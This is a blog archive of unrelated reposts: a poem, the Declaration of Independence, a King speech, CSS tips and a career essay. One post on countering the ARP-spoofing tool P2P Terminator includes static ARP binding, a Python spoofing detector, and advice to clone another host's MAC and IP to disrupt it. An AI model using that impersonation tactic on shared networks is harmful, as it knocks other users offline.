The New Colossus

A poem by Emma Lazarus is graven on a tablet within the pedestal on which the statue stands
===========================


Not like the brazen giant of Greek fame,

With conquering limbs astride from land to land;

Here at our sea-washed, sunset gates shall stand

A mighty woman with a torch, whose flame

Is the imprisoned lightning, and her name

Mother of Exiles. From her beacon-hand

Glows world-wide welcome; her mild eyes command

The air-bridged harbor that twin cities frame.

"Keep ancient lands, your storied pomp!" cries she

With silent lips. "Give me your tired, your poor,

Your huddled masses yearning to breathe free,

The wretched refuse of your teeming shore.

Send these, the homeless, tempest-tost to me,

I lift my lamp beside the golden door!"

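Saturday, May 19, 2007

[Repost] How to defeat P2P Terminator

P2P Terminator uses ARP sniffing and ARP spoofing, so the basic way to defeat it is to use ARP-attack methods. They come down to the following:

1. Use VLANs
As long as your PC and the P2P Terminator software are not in the same VLAN, it cannot do anything to you.

2. Use two-way IP/MAC binding
Bind the MAC address of your egress router on the PC; P2P Terminator then cannot ARP-spoof you and so cannot control you. Binding the router's MAC on the PC alone is still not safe, however, because P2P Terminator can spoof the router. The best solution is therefore two-way IP/MAC binding on both the PC and the router: bind the egress router's MAC address on the PC, and bind the PC's IP and MAC address on the router. This requires a router that supports IP/MAC binding, such as a HIPER router.

3. Use IP/MAC address spoofing plus IP/MAC binding
Simply change your own MAC address and IP address to the same IP and MAC as the machine running P2P Terminator and see how it manages then. This approach hurts both sides, and the change needs a little care or an IP conflict will be reported: change the MAC address first and then the IP, and Windows will not report an IP conflict (silly Windows). That is not all: it is best to also bind the router's MAC address on the PC, so that P2P Terminator's spoofing of the router is wasted effort too.

On XP: just use the arp command to bind your own MAC and the router's MAC,
e.g.: arp -s <own IP> <own MAC>
arp -s <router IP> <router MAC>
It is best to bind both. I have tried it: with only the router bound, once there was an IP conflict I could not get online, and others could still kick me offline. With my own address bound as well, I could still get online even with an IP conflict.
9x/2000 need extra software;
downloading Anti ARP Sniffer is enough.

Anti-ARP tool collection
Download address:
http://www.sbei.org/best/showdown.asp?soft_id="106"

Set the router's IP and MAC.
I am on XP and installed this software as well; it clearly shows who is trying to kick you offline or throttle you.
I recommend switching to XP.
With the settings above, P2P Terminator is useless.

On XP, type at the cmd prompt: arp -a
If the router's IP and your own IP show static at the end of the line, the binding succeeded.
arp -d
It is best to run this before binding as well, to delete illegitimate bindings.

Alternatively, download 网络执法官 from the internet and run it on any machine on the LAN. Not much needs saying about this software; it is a very good network administration tool.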
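
The arp -a check described in the post, as an added Python example that is not part of the original post: it parses arp -a output, reports whether the router's entry is a static binding to the expected MAC address, and lists MAC addresses that answer for more than one IP address, which is a common sign of ARP spoofing on the LAN. The sample output and all addresses are constructed, and the three-column line layout (address, MAC, type) is assumed to be that printed by the Windows arp command.

```python
import re
from collections import defaultdict

# Constructed sample of `arp -a` output on a Windows host.
SAMPLE_ARP_OUTPUT = """
Interface: 192.168.1.23 --- 0x2
  Internet Address      Physical Address      Type
  192.168.1.1           00-11-22-33-44-55     static
  192.168.1.50          00-AA-BB-CC-DD-EE     dynamic
  192.168.1.77          00-aa-bb-cc-dd-ee     dynamic
"""

ENTRY_RE = re.compile(
    r"^\s*(\d{1,3}(?:\.\d{1,3}){3})\s+"           # IPv4 address
    r"([0-9A-Fa-f]{2}(?:-[0-9A-Fa-f]{2}){5})\s+"  # MAC address, dash-separated
    r"(\w+)\s*$"                                  # entry type: static / dynamic
)


def parse_arp(text):
    """Return a list of (ip, mac, type) tuples; header lines are skipped."""
    entries = []
    for line in text.splitlines():
        m = ENTRY_RE.match(line)
        if m:
            entries.append((m.group(1), m.group(2).lower(), m.group(3).lower()))
    return entries


def check_binding(entries, ip, expected_mac):
    """Classify the ARP entry for `ip`: missing, mismatch, dynamic or ok."""
    expected_mac = expected_mac.lower()
    for entry_ip, mac, kind in entries:
        if entry_ip != ip:
            continue
        if mac != expected_mac:
            return "mismatch"   # the cache holds a different MAC than expected
        if kind != "static":
            return "dynamic"    # correct for now, but can still be overwritten
        return "ok"
    return "missing"


def duplicate_macs(entries):
    """Map each MAC that appears for several IP addresses to those addresses."""
    by_mac = defaultdict(list)
    for ip, mac, _kind in entries:
        by_mac[mac].append(ip)
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}


if __name__ == "__main__":
    table = parse_arp(SAMPLE_ARP_OUTPUT)
    print("router binding:", check_binding(table, "192.168.1.1", "00-11-22-33-44-55"))
    for mac, ips in duplicate_macs(table).items():
        print("MAC", mac, "answers for", ", ".join(ips))
```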

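Thursday, May 17, 2007

[Repost] CSS odds and ends

1. Block versus inline elements

  Every HTML element is either block or inline.
  Block elements:
  always begin on a new line;
  have controllable height, line-height and top and bottom margins;
  default to 100% of the width of their container unless a width is set.
div, p, h1, form, ul and li are examples of block elements.
  Inline elements, by contrast:
  sit on the same line as other elements;
  have height, line-height and top and bottom margins that cannot be changed;
  are exactly as wide as their text or image, and this cannot be changed.
  span, a, label, input, img, strong and em are examples of inline elements.
  The display: inline or display: block command changes this characteristic of an element. When would you need to change it?
  To make an inline element start on a new line;
  to keep a block element on the same line as other elements;
  to control the width of an inline element (especially useful for navigation bars);
  to control the height of an inline element;
  to give a block element a background color only as wide as its text without setting a width.

2. One more box hack

  There are so many box hacks because, before version 6, IE understood the box differently from everyone else: its width includes the border width and the padding. To make IE5 and the like agree with other browsers, you can use this CSS:
  padding: 2em;
  border: 1em solid green;
  width: 20em;
  width/**/:/**/ 14em;
  Every browser understands the first width, but IE5.x does not understand the width setting on the second line, simply because that line contains empty comment markers (what a dumb parser!). So IE5.x takes 20 and subtracts some padding, while other browsers use the width of 14, because it is the second line and overrides the first.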

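3. Minimum page width

  min-width is a very handy CSS command: it specifies that an element must never be narrower than a given width, which keeps the layout correct. IE does not understand it, though, and in practice treats width as the minimum width. To make this command work in IE as well, put a <div> inside the <body> tag and give the div a class:
  <body>
  <div class="container">
  Then write the CSS like this:
  .container
  {
  min-width: 600px;
  width: expression(document.body.clientWidth < 1200 ? "1200px" : "auto");
  }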

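4. IE and the width/height problem

  IE does not understand the min- definitions, but in practice it treats ordinary width and height as if they were minimums. That is a big problem: if you use only width and height, the two values never change in normal browsers; if you use only min-width and min-height, IE effectively has no width or height set at all.
  This matters, for example, when setting a background image, where the width is important. The problem can be solved like this:
  .box
  {
  width: 80px;
  height: 35px;
  }
  html>body .box
  {
  width: auto;
  height: auto;
  min-width: 80px;
  min-height: 35px;
  }
  All browsers can use the first box rule, but IE does not understand the second one because it uses the child selector. The second rule is more specific, so it overrides the first.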

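5. The text-transform command

  The text-transform command is very useful. It has three values: text-transform: uppercase, text-transform: lowercase and text-transform: capitalize. The first turns text into all capitals, the second into all lower case, and the third capitalizes initial letters. This is very useful for alphabetic scripts: even if the text was entered with the wrong case, it does not show on the page.

6. Disappearing text or images in IE

  Sometimes text or a background image suddenly disappears and reappears after a refresh; this is more likely near floated elements (note: I have never seen it). In that case set position: relative on the disappearing element; if that does not work, try giving these elements a width.

7. Invisible text

  Whatever the reason for wanting some page text not to show in the browser, for example hiding some text for print or for small screens, you can use display: none. This is very simple, but for some people it is of little use because they can remove this control; in that case use: position: absolute; left: -9000px.
This in effect positions the text outside the page.

8. A dedicated CSS for handheld devices

  That is, for small-screen users such as phones and PDAs, a dedicated CSS can be designed to make pages more comfortable to view. To see the effect, resize the browser window to 150 pixels wide. The syntax for specifying a handheld-only CSS is:
  <link media="handheld" href="handheldstyle.css" type="text/css" rel="stylesheet">
  You can also read up on usability for handheld devices.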

9. Buttons with a 3D effect

  In the past, making a button with a 3D effect that also changes when clicked required image replacement; now CSS alone can do it:
  a
  {
  display: block;
  border: 1px solid;
  border-color: #aaa #000 #000 #aaa;
  width: 8em;
  background: #fc0;
  }
  a:hover
  {
  position: relative;
  top: 1px;
  left: 1px;
  border-color: #000 #aaa #aaa #000;
  }
  As for the effect, you can tune it yourself.

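10. Using the same navigation code on different pages

  Many pages have a navigation menu; when you enter a page, the corresponding menu item should be grayed out while the items for the other pages stay lit. Achieving this normally means writing code or designing each page separately, but it can now be done with CSS alone.
  First, use CSS classes in the navigation code:
<ul>
<li><a href="#" class="home">Home</a></li>
<li><a href="#" class="about">About us</a></li>
<li><a href="#" class="contact">Contact us</a></li>
</ul>
  Then give the body of each page an id with the same name as the class above, e.g. <body id="contact">.
  Then write the CSS as follows:
  #home .home, #about .about, #contact .contact
  {
  /* commands for highlighted navigation go here */
  }
  Here, when the id is set to home, .home takes effect; that is, the navigation item whose class is home shows the special effect. The same goes for the other pages.

Gray-outline, white-frame effect for images

It really is very simple, though the idea itself is not so simple, and the result looks quite nice.

HTML:
<div class="pic">
CSS definition:
.pic{padding:4px;border:1px solid #ADB4B8;background:#FFF}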

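Monday, May 14, 2007

[Repost] On where technical people ultimately end up

  As technical people, we all feel that the pay is high, the work is stable, and there is a lot to learn. It is the inevitable choice of most people who are fresh out of school, or introverted, or who hope for a quiet life. But have you ever asked yourselves whether this is really the right road?
  For a new university graduate, the pay gap between a sales job and a technical job may be several-fold. To someone just out of school, that is an extreme temptation. A young graduate will of course decisively choose the technical road.
  Two years on, look again: with accumulated experience, the salesperson has built up some client resources and the technician has built up good experience; each has spread their wings in their own field, and their incomes are roughly level.
  After that, the technical road gets harder and harder, since technical work demands a great deal of time and energy, or you cannot keep up with today's pace of technical change. The salesperson, meanwhile, has an ever larger client base and ever richer experience. Whose income will be higher?
  The two professions each have their own characteristics: the technical trade is a place where you neither starve nor eat your fill, while sales is a road of development with no end.
  Past thirty, what does everyone choose? Marriage, children, life's well-worn path. Most technicians have become heads of technical departments, a decent position; and the salesperson? Perhaps still a sales rep, since most of the business is concentrated in a few hands. Through the ages, the concentration of wealth has always looked like this! But compare the successful people in the two professions: is the gap not enormous?
  Study until you die, work until you die, and never get rich: what is there in technical work worth clinging to!
  At thirty, do you still have the confidence to face a heavy workload? Do you have the energy of someone who has just entered the workforce? Can you match their working hours and show off for the boss as if your life depended on it? Can you leave your wife and children for a business trip of a month or two? Can you be ordered around by kids ten years younger than you?
  I can't......
  Some will say: I have my skills!
  What is technical experience? Old things that have passed; it stands for the past you are attached to, the part you cannot let go of; you use experience to judge things and choose how to work. During the handover between old and new technologies, experience can bridge the two and make you look impressive. But how much of your experience from two years ago will you still use?
  The skills we hold will eventually become obsolete, and the day our minds stiffen will come. Where will you go then?
  If your goal is just to buy a kennel of a home and set up a small cigarette stall, please read no further. "Contentment brings happiness" is also a state of life; I envy the monks on Mount Wutai, but I cannot do it!
  There are luxury homes everywhere; why should I live in a 10-square-meter room? The streets are full of cars; why should I squeeze onto the bus every day? I will strive not to be squeezing onto buses after thirty!

  Changing track ------ the choice technical people must make!
  Change to what?
  What is the advantage of technical skill? Were the past few years wasted?
  How to change?
  Let us analyze occupations: what kind of work makes us more valuable the older we get?
  Officials!
  Needless to say, number one; just look at the central leadership.
  Finance
  Every boss likes someone a bit older: steadier! Most companies also bring in some old man as finance director, who draws a salary without clocking in. Nothing else to it: a master of cooking the books. My old man gets paid by the day at year end.
  Teachers
  A fine job: the old professor, and how do you become a professor without being old. A prime target when looking for a wife. As for marrying one as a husband? Forget it.
  For the occupations above, technical people have little chance; most cannot make such a big turn.
  Our way out lies in only two directions: sales and technical management!
  First, sales.
  Do you have this feeling: salespeople say every day that today's clients are hard to deal with, yet you find that clients are actually nice people and easy to befriend. That is your advantage!
  Your technical background has already made them accept you easily. You have plenty to talk about with them and can really solve many practical problems for them. You often see things from their side, and what you say convinces them. What client would not love such a salesperson?
  In sales, the hardest part is making first contact with a client, and you can already break through on the strength of your skills, so what is there to fear? As long as you are not too greedy, clients will always be your friends.   Study some psychology, practice your speaking, and lose a bit of weight. After hitting the wall and getting burned a few times, in what way will you not look like a sales ace?
  Next, technical management.
  You already have the skills and all that experience. Bring it all out to get things done and train newcomers, and you will find people looking up at you. In fact you have merely taken away their chance to do things hands-on; perhaps they will follow your line of thinking and become extensions of your hands, a bigger stage for showing your ability. Then all the credit is yours; how could the boss not value you, and how could your position not rise?
  But this is only the lesser way.
  The higher way is to win hearts......
  First, win over your own.
  Step one: set your goals: how much your salary should rise and what position to reach within what time, whether your direct superior is the owner or someone else. If you feel you have hit the ceiling, leave. Find a new goal. Do not hesitate.
  Step two: bring out all your abilities and show them to others; do every task wholeheartedly. Perhaps a talent-spotter's eyes are on you at this very moment.
  Step three: improve your technical and management ability. By technical ability I do not mean chasing the newest technology without end; you no longer have the time. Instead, turn back and seek the roots of the technology; once you have mastered them, however technology develops, you need only a little time to pick up the latest.
  As for management ability: as long as it does not harm the boss's interests, manage what you should manage as far as you can, and offer opinions on what is not yours to manage. Right or wrong, success or failure, it all adds to your experience.
  Step four: dare to take responsibility, whether or not the outcome may be failure. A person with the courage to own a failure earns more respect. Besides, how much do you lose if you fail? At worst you leave.
  Next, win over the hearts of others
  Whether dealing with those above or below you, be both bold and shrewd; use the rational analysis that technical work teaches to grasp the crux of a matter. "Know yourself and know your enemy", and the result is almost always "a hundred battles without defeat".
  Toward subordinates, care for them as much as you can and carry the difficulties yourself; share out the good things and give away a little of the credit, since you have plenty already. When they do well, people will say you led them well; when they get it wrong and you step in to fix it, the credit is more than a little.
  Do not hold back skills from subordinates and colleagues either. We do not live by a craft and we are not collecting antiques; why wait until it has turned to rubbish before bringing it out to embarrass yourself? Give it your all! Let everyone become your apprentice, and your popularity will follow naturally.
  In short, there is much, much more......
  I think the most glorious time always passes. In this money-filled society, who is not a weight on the scales? A lump of gold always outweighs a lump of iron the same size!
  Here I keep thinking, thinking about the road I should take from now on, and I also wish you all a home of your own to live in, a car of your own to drive, money of your own to spend, and face of your own to show.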

Friday, May 11, 2007

A common way to do forum page numbers

Start with a <div class="p_bar">
CSS definition:
.p_bar {margin: 1px 0px;clear: both;}
.p_bar a {float: left;padding: 1px 4px;font-size: 12px;text-decoration: none;}

Then, inside this DIV, list
<a href="forum-11-2.html" class="p_num">1</a> one after another

CSS definition:
.p_num {background-color: #FFFFFF;border: 1px solid #DEDEB8;margin-right:1px;vertical-align: middle;}
a:hover.p_num {background-color: #F5FBFF;border: 1px solid #86B9D6;text-decoration: none;}

Wednesday, May 9, 2007

I Have A Dream

In 1950's America, the equality of man envisioned by the Declaration of Independence was far from a reality. People of color — blacks, Hispanics, Orientals — were discriminated against in many ways, both overt and covert. The 1950's were a turbulent time in America, when racial barriers began to come down due to Supreme Court decisions, like Brown v. Board of Education; and due to an increase in the activism of blacks, fighting for equal rights.

Martin Luther King, Jr., a Baptist minister, was a driving force in the push for racial equality in the 1950's and the 1960's. In 1963, King and his staff focused on Birmingham, Alabama. They marched and protested non-violently, raising the ire of local officials who sicced water cannon and police dogs on the marchers, whose ranks included teenagers and children. The bad publicity and break-down of business forced the white leaders of Birmingham to concede to some anti-segregation demands.

Thrust into the national spotlight in Birmingham, where he was arrested and jailed, King organized a massive march on Washington, DC, on August 28, 1963. On the steps of the Lincoln Memorial, he evoked the name of Lincoln in his "I Have a Dream" speech, which is credited with mobilizing supporters of desegregation and prompted the 1964 Civil Rights Act. The next year, King was awarded the Nobel Peace Prize.
The following is the exact text of the spoken speech, transcribed from recordings.
-------------------------------------------------
I am happy to join with you today in what will go down in history as the greatest demonstration for freedom in the history of our nation.
Five score years ago, a great American, in whose symbolic shadow we stand today, signed the Emancipation Proclamation. This momentous decree came as a great beacon light of hope to millions of Negro slaves who had been seared in the flames of withering injustice. It came as a joyous daybreak to end the long night of their captivity.

But one hundred years later, the Negro still is not free. One hundred years later, the life of the Negro is still sadly crippled by the manacles of segregation and the chains of discrimination. One hundred years later, the Negro lives on a lonely island of poverty in the midst of a vast ocean of material prosperity. One hundred years later, the Negro is still languishing in the corners of American society and finds himself an exile in his own land. So we have come here today to dramatize a shameful condition.

In a sense we have come to our nation's capital to cash a check. When the architects of our republic wrote the magnificent words of the Constitution and the Declaration of Independence, they were signing a promissory note to which every American was to fall heir. This note was a promise that all men, yes, black men as well as white men, would be guaranteed the unalienable rights of life, liberty, and the pursuit of happiness.

It is obvious today that America has defaulted on this promissory note insofar as her citizens of color are concerned. Instead of honoring this sacred obligation, America has given the Negro people a bad check, a check which has come back marked "insufficient funds." But we refuse to believe that the bank of justice is bankrupt. We refuse to believe that there are insufficient funds in the great vaults of opportunity of this nation. So we have come to cash this check — a check that will give us upon demand the riches of freedom and the security of justice. We have also come to this hallowed spot to remind America of the fierce urgency of now. This is no time to engage in the luxury of cooling off or to take the tranquilizing drug of gradualism. Now is the time to make real the promises of democracy. Now is the time to rise from the dark and desolate valley of segregation to the sunlit path of racial justice. Now is the time to lift our nation from the quick sands of racial injustice to the solid rock of brotherhood. Now is the time to make justice a reality for all of God's children.

It would be fatal for the nation to overlook the urgency of the moment. This sweltering summer of the Negro's legitimate discontent will not pass until there is an invigorating autumn of freedom and equality. Nineteen sixty-three is not an end, but a beginning. Those who hope that the Negro needed to blow off steam and will now be content will have a rude awakening if the nation returns to business as usual. There will be neither rest nor tranquility in America until the Negro is granted his citizenship rights. The whirlwinds of revolt will continue to shake the foundations of our nation until the bright day of justice emerges.

But there is something that I must say to my people who stand on the warm threshold which leads into the palace of justice. In the process of gaining our rightful place we must not be guilty of wrongful deeds. Let us not seek to satisfy our thirst for freedom by drinking from the cup of bitterness and hatred.

We must forever conduct our struggle on the high plane of dignity and discipline. We must not allow our creative protest to degenerate into physical violence. Again and again we must rise to the majestic heights of meeting physical force with soul force. The marvelous new militancy which has engulfed the Negro community must not lead us to distrust of all white people, for many of our white brothers, as evidenced by their presence here today, have come to realize that their destiny is tied up with our destiny and their freedom is inextricably bound to our freedom. We cannot walk alone.

As we walk, we must make the pledge that we shall march ahead. We cannot turn back. There are those who are asking the devotees of civil rights, "When will you be satisfied?" We can never be satisfied as long as the Negro is the victim of the unspeakable horrors of police brutality. We can never be satisfied, as long as our bodies, heavy with the fatigue of travel, cannot gain lodging in the motels of the highways and the hotels of the cities. We can never be satisfied as long as a Negro in Mississippi cannot vote and a Negro in New York believes he has nothing for which to vote. No, no, we are not satisfied, and we will not be satisfied until justice rolls down like waters and righteousness like a mighty stream.

I am not unmindful that some of you have come here out of great trials and tribulations. Some of you have come fresh from narrow jail cells. Some of you have come from areas where your quest for freedom left you battered by the storms of persecution and staggered by the winds of police brutality. You have been the veterans of creative suffering.

Continue to work with the faith that unearned suffering is redemptive.
Go back to Mississippi, go back to Alabama, go back to South Carolina, go back to Georgia, go back to Louisiana, go back to the slums and ghettos of our northern cities, knowing that somehow this situation can and will be changed. Let us not wallow in the valley of despair.

I say to you today, my friends, so even though we face the difficulties of today and tomorrow, I still have a dream. It is a dream deeply rooted in the American dream.

I have a dream that one day this nation will rise up and live out the true meaning of its creed: "We hold these truths to be self-evident: that all men are created equal."

I have a dream that one day on the red hills of Georgia the sons of former slaves and the sons of former slave owners will be able to sit down together at the table of brotherhood.

I have a dream that one day even the state of Mississippi, a state sweltering with the heat of injustice, sweltering with the heat of oppression, will be transformed into an oasis of freedom and justice.

I have a dream that my four little children will one day live in a nation where they will not be judged by the color of their skin but by the content of their character.

I have a dream today.

I have a dream that one day, down in Alabama, with its vicious racists, with its governor having his lips dripping with the words of interposition and nullification; one day right there in Alabama, little black boys and black girls will be able to join hands with little white boys and white girls as sisters and brothers.

I have a dream today.

I have a dream that one day every valley shall be exalted, every hill and mountain shall be made low, the rough places will be made plain, and the crooked places will be made straight, and the glory of the Lord shall be revealed, and all flesh shall see it together.

This is our hope. This is the faith that I go back to the South with. With this faith we will be able to hew out of the mountain of despair a stone of hope. With this faith we will be able to transform the jangling discords of our nation into a beautiful symphony of brotherhood. With this faith we will be able to work together, to pray together, to struggle together, to go to jail together, to stand up for freedom together, knowing that we will be free one day.

This will be the day when all of God's children will be able to sing with a new meaning, "My country, 'tis of thee, sweet land of liberty, of thee I sing. Land where my fathers died, land of the pilgrim's pride, from every mountainside, let freedom ring."

And if America is to be a great nation this must become true. So let freedom ring from the prodigious hilltops of New Hampshire. Let freedom ring from the mighty mountains of New York. Let freedom ring from the heightening Alleghenies of Pennsylvania!

Let freedom ring from the snowcapped Rockies of Colorado!

Let freedom ring from the curvaceous slopes of California!

But not only that; let freedom ring from Stone Mountain of Georgia!

Let freedom ring from Lookout Mountain of Tennessee!

Let freedom ring from every hill and molehill of Mississippi. From every mountainside, let freedom ring.

And when this happens, when we allow freedom to ring, when we let it ring from every village and every hamlet, from every state and every city, we will be able to speed up that day when all of God's children, black men and white men, Jews and Gentiles, Protestants and Catholics, will be able to join hands and sing in the words of the old Negro spiritual, "Free at last! free at last! thank God Almighty, we are free at last!"

The Declaration of Independence

IN CONGRESS, JULY 4, 1776
The unanimous Declaration of the thirteen united States of America

When in the Course of human events it becomes necessary for one people to dissolve the political bands which have connected them with another and to assume among the powers of the earth, the separate and equal station to which the Laws of Nature and of Nature's God entitle them, a decent respect to the opinions of mankind requires that they should declare the causes which impel them to the separation.

We hold these truths to be self-evident, that all men are created equal, that they are endowed by their Creator with certain unalienable Rights, that among these are Life, Liberty and the pursuit of Happiness. — That to secure these rights, Governments are instituted among Men, deriving their just powers from the consent of the governed, — That whenever any Form of Government becomes destructive of these ends, it is the Right of the People to alter or to abolish it, and to institute new Government, laying its foundation on such principles and organizing its powers in such form, as to them shall seem most likely to effect their Safety and Happiness. Prudence, indeed, will dictate that Governments long established should not be changed for light and transient causes; and accordingly all experience hath shewn that mankind are more disposed to suffer, while evils are sufferable than to right themselves by abolishing the forms to which they are accustomed. But when a long train of abuses and usurpations, pursuing invariably the same Object evinces a design to reduce them under absolute Despotism, it is their right, it is their duty, to throw off such Government, and to provide new Guards for their future security. — Such has been the patient sufferance of these Colonies; and such is now the necessity which constrains them to alter their former Systems of Government. The history of the present King of Great Britain is a history of repeated injuries and usurpations, all having in direct object the establishment of an absolute Tyranny over these States. To prove this, let Facts be submitted to a candid world.

He has refused his Assent to Laws, the most wholesome and necessary for the public good.

He has forbidden his Governors to pass Laws of immediate and pressing importance, unless suspended in their operation till his Assent should be obtained; and when so suspended, he has utterly neglected to attend to them.

He has refused to pass other Laws for the accommodation of large districts of people, unless those people would relinquish the right of Representation in the Legislature, a right inestimable to them and formidable to tyrants only.

He has called together legislative bodies at places unusual, uncomfortable, and distant from the depository of their Public Records, for the sole purpose of fatiguing them into compliance with his measures.

He has dissolved Representative Houses repeatedly, for opposing with manly firmness his invasions on the rights of the people.

He has refused for a long time, after such dissolutions, to cause others to be elected, whereby the Legislative Powers, incapable of Annihilation, have returned to the People at large for their exercise; the State remaining in the mean time exposed to all the dangers of invasion from without, and convulsions within.

He has endeavoured to prevent the population of these States; for that purpose obstructing the Laws for Naturalization of Foreigners; refusing to pass others to encourage their migrations hither, and raising the conditions of new Appropriations of Lands.

He has obstructed the Administration of Justice by refusing his Assent to Laws for establishing Judiciary Powers.

He has made Judges dependent on his Will alone for the tenure of their offices, and the amount and payment of their salaries.

He has erected a multitude of New Offices, and sent hither swarms of Officers to harass our people and eat out their substance.

He has kept among us, in times of peace, Standing Armies without the Consent of our legislatures.

He has affected to render the Military independent of and superior to the Civil Power.

He has combined with others to subject us to a jurisdiction foreign to our constitution, and unacknowledged by our laws; giving his Assent to their Acts of pretended Legislation:

For quartering large bodies of armed troops among us:

For protecting them, by a mock Trial from punishment for any Murders which they should commit on the Inhabitants of these States:

For cutting off our Trade with all parts of the world:

For imposing Taxes on us without our Consent:

For depriving us in many cases, of the benefit of Trial by Jury:

For transporting us beyond Seas to be tried for pretended offences:

For abolishing the free System of English Laws in a neighbouring Province, establishing therein an Arbitrary government, and enlarging its Boundaries so as to render it at once an example and fit instrument for introducing the same absolute rule into these Colonies:

For taking away our Charters, abolishing our most valuable Laws and altering fundamentally the Forms of our Governments:

For suspending our own Legislatures, and declaring themselves invested with power to legislate for us in all cases whatsoever.

He has abdicated Government here, by declaring us out of his Protection and waging War against us.

He has plundered our seas, ravaged our coasts, burnt our towns, and destroyed the lives of our people.

He is at this time transporting large Armies of foreign Mercenaries to compleat the works of death, desolation, and tyranny, already begun with circumstances of Cruelty & Perfidy scarcely paralleled in the most barbarous ages, and totally unworthy the Head of a civilized nation.

He has constrained our fellow Citizens taken Captive on the high Seas to bear Arms against their Country, to become the executioners of their friends and Brethren, or to fall themselves by their Hands.

He has excited domestic insurrections amongst us, and has endeavoured to bring on the inhabitants of our frontiers, the merciless Indian Savages whose known rule of warfare, is an undistinguished destruction of all ages, sexes and conditions.

In every stage of these Oppressions We have Petitioned for Redress in the most humble terms: Our repeated Petitions have been answered only by repeated injury. A Prince, whose character is thus marked by every act which may define a Tyrant, is unfit to be the ruler of a free people.

Nor have We been wanting in attentions to our British brethren. We have warned them from time to time of attempts by their legislature to extend an unwarrantable jurisdiction over us. We have reminded them of the circumstances of our emigration and settlement here. We have appealed to their native justice and magnanimity, and we have conjured them by the ties of our common kindred to disavow these usurpations, which would inevitably interrupt our connections and correspondence. They too have been deaf to the voice of justice and of consanguinity. We must, therefore, acquiesce in the necessity, which denounces our Separation, and hold them, as we hold the rest of mankind, Enemies in War, in Peace Friends.

We, therefore, the Representatives of the united States of America, in General Congress, Assembled, appealing to the Supreme Judge of the world for the rectitude of our intentions, do, in the Name, and by Authority of the good People of these Colonies, solemnly publish and declare, That these united Colonies are, and of Right ought to be Free and Independent States, that they are Absolved from all Allegiance to the British Crown, and that all political connection between them and the State of Great Britain, is and ought to be totally dissolved; and that as Free and Independent States, they have full Power to levy War, conclude Peace, contract Alliances, establish Commerce, and to do all other Acts and Things which Independent States may of right do. — And for the support of this Declaration, with a firm reliance on the protection of Divine Providence, we mutually pledge to each other our Lives, our Fortunes and our sacred Honor.

John Hancock

New Hampshire:
Josiah Bartlett, William Whipple, Matthew Thornton

Massachusetts:
John Hancock, Samuel Adams, John Adams, Robert Treat Paine, Elbridge Gerry

Rhode Island:
Stephen Hopkins, William Ellery

Connecticut:
Roger Sherman, Samuel Huntington, William Williams, Oliver Wolcott

New York:
William Floyd, Philip Livingston, Francis Lewis, Lewis Morris

New Jersey:
Richard Stockton, John Witherspoon, Francis Hopkinson, John Hart, Abraham Clark

Pennsylvania:
Robert Morris, Benjamin Rush, Benjamin Franklin, John Morton, George Clymer, James Smith, George Taylor, James Wilson, George Ross

Delaware:
Caesar Rodney, George Read, Thomas McKean

Maryland:
Samuel Chase, William Paca, Thomas Stone, Charles Carroll of Carrollton

Virginia:
George Wythe, Richard Henry Lee, Thomas Jefferson, Benjamin Harrison, Thomas Nelson, Jr., Francis Lightfoot Lee, Carter Braxton

North Carolina:
William Hooper, Joseph Hewes, John Penn

South Carolina:
Edward Rutledge, Thomas Heyward, Jr., Thomas Lynch, Jr., Arthur Middleton

Georgia:
Button Gwinnett, Lyman Hall, George Walton

Tuesday, May 8, 2007

English Lyrics of "The Internationale"

The Internationale: Original English Version
Original words by Eugene Pottier.
Original music by Pierre Degeyter.

Arise ye starvelings [or workers] from your slumbers
Arise ye criminals of want
For reason in revolt now thunders
and at last ends the age of cant.
Now away with all your superstitions
Servile masses arise, arise!
We'll change forthwith [or henceforth] the old conditions
And spurn the dust to win the prize.

CHORUS

Then come comrades rally
And the last fight let us face
The Internationale
Unites the human race. (repeat).

We peasants, artisans and others,
Enrolled amongst the sons of toil
Let's claim the earth henceforth for brothers
Drive the indolent from the soil.
On our flesh for too long has fed the raven
We've too long been the vultures' prey.
But now farewell to spirit craven
The dawn brings in a brighter day.

CHORUS

No saviour from on high delivers
No trust we have in prince or peer
Our own right hand the chains must shiver
Chains of hatred, greed and fear.
Ere the thieves will out with their booty
And to all give a happier lot.
Each at his forge must do his duty
And strike the iron while it's hot.

CHORUS
__________________________________



A more modern version: The Internationale
Words: Billy Bragg
Music: Pierre Degeyter

Stand up, all victims of oppression
For the tyrants fear your might
Don't cling so hard to your possessions
For you have nothing, if you have no rights
Let racist ignorance be ended
For respect makes the empires fall
Freedom is merely privilege extended
Unless enjoyed by one and all

Chorus:
So come brothers and sisters
For the struggle carries on
The Internationale
Unites the world in song
So comrades come rally
For this is the time and place
The international ideal
Unites the human race

Let no one build walls to divide us
Walls of hatred nor walls of stone
Come greet the dawn and stand beside us
We'll live together or we'll die alone
In our world poisoned by exploitation
Those who have taken, now they must give
And end the vanity of nations
We've but one Earth on which to live

And so begins the final drama
In the streets and in the fields
We stand unbowed before their armour
We defy their guns and shields
When we fight, provoked by their aggression
Let us be inspired by life and love
For though they offer us concessions
Change will not come from above

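Monday, April 23, 2007

[Repost] 30 Steps to Building Website Trust

Website trust has two meanings: on the one hand, it refers to how much visitors trust the site; on the other, it refers to the trust value a search engine assigns to the site (TrustRank). Website trust matters even more for corporate sites. Below I share some of my views, mainly from the user-experience angle: supposing I were the user, this is what I would hope to see.
Building trust shows in the following areas:
1. About Us page: describe the company's background, history, scope of business and so on in detail and truthfully.
2. Site registration: obtain ICP registration approval.
3. Service process: let customers fully understand the whole process, making the service more transparent.
4. Price list: give a price range for each of the different services.
5. Customer cases: customers are more willing to accept a third party's evaluation.
6. Contact details: detailed, complete, multi-channel contact information, with a map showing the location.
7. Page count: a substantial number of pages; a corporate site should have at least 50.
8. Original content: customers dislike arguments that circulate everywhere.
9. Copyright information: write the copyright notice correctly. State that the site's content is protected by law, that reposting is refused, and so on.
10. Privacy protection: state that customer and visitor information is given privacy protection.
11. No typos: a customer who sees typos will think, "If they don't even proofread their pages, the service quality is doubtful too."
12. Partners: links to partners and coverage on the partners' sites.
13. Technical terms: use technical terms appropriately, without hampering reading, and give simple, easy-to-understand explanations.
14. Company news: list the various coverage given by third parties.
15. Link checking: make sure the whole site has no dead links.
16. Appropriate advertising: do not place irrelevant ads.
17. Link exchanges: exchange links only with customers, government and well-known sites in the industry.
18. Free consultation: provide toll-free 400 or 800 phone consultation; at the very least offer online consultation or a guestbook.
19. Access speed: do not let users and search engines feel the site is slow.
20. Page color scheme: using the colors in the company logo is recommended.
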